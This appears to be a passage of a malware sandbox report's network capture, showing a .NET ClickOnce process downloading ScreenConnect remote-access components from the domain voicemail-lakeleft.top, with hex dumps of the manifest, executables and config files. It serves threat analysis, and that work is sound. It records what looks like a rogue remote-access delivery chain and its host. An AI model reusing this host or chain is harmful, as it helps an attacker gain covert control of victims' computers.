                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC16384INData Raw: 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 77 6a 56 69 63 51 41 50 41 73 71 58 76 61 53 64 43 51 58 67 39 68 45 36 4c 78 58 43 6d 65 42 6c 48 64 41 4a 75 66 68 39 6a 49 78 59 6e 30 41 42 32 6d 55 52 58 2b 6e 35 68 35 50 4d 7a 46 49 78 42 38 54 4b 4f 2b 41 53 38 39 54 61 2b 52 69 78 4f 6f 41 48 4d 6e 6a 76 33 32 68 45 62 34 6f 50 48 6e 64 44 72 42 57 4e
                                                                                                                                                                                                                                                                  Data Ascii: n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxEwjVicQAPAsqXvaSdCQXg9hE6LxXCmeBlHdAJufh9jIxYn0AB2mURX+n5h5PMzFIxB8TKO+AS89Ta+RixOoAHMnjv32hEb4oPHndDrBWN
                                                                                                                                                                                                                                                                  2024-11-08 10:09:20 UTC3543INData Raw: 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 45 45 4d 41 6b 72 73 42 6a 36 45 49 79 69 42 4a 41 41 4a 4d 61 53 42 6d 2f 43 38 6b 67 53 67 41 42 54 48 49 67 5a 66 77 75 4a 49 4d 6f 41 51 51 77 79 57 6b 63 4b 37 30 41 76 6d 38 51 4a 51 41 43 4f 4e 63 30 6a 6e 76 68 58 55 68 71 73 41 41 45 4d 4b 6b 72 38 47 70 38 46 35 49 61 4c 41 41 42 7a 48 55 37 74 33 51
                                                                                                                                                                                                                                                                  Data Ascii: yvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PEEEMAkrsBj6EIyiBJAAJMaSBm/C8kgSgABTHIgZfwuJIMoAQQwyWkcK70Avm8QJQACONc0jnvhXUhqsAAEMKkr8Gp8F5IaLAABzHU7t3Q


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.749708194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:22 UTC104OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:22 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 17866
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:22 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:22 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                                  2024-11-08 10:09:22 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                                                                                                                                  Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.749730194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC106OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 95520
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:26 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                                                                                                                                  Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                                                                                                                                  Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                                                                                                                                  Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                                                                                                                                  Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                                  2024-11-08 10:09:27 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                                                                                                                  Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.749737194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:28 UTC114OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:28 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 61216
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:28 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:28 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:28 UTC16384INData Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19
                                                                                                                                                                                                                                                                  Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                                  2024-11-08 10:09:29 UTC16384INData Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00
                                                                                                                                                                                                                                                                  Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
                                                                                                                                                                                                                                                                  2024-11-08 10:09:29 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31
                                                                                                                                                                                                                                                                  Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.749748194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:29 UTC118OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:30 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:30 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:30 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.749754194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:31 UTC113OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:31 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 266
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:31 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
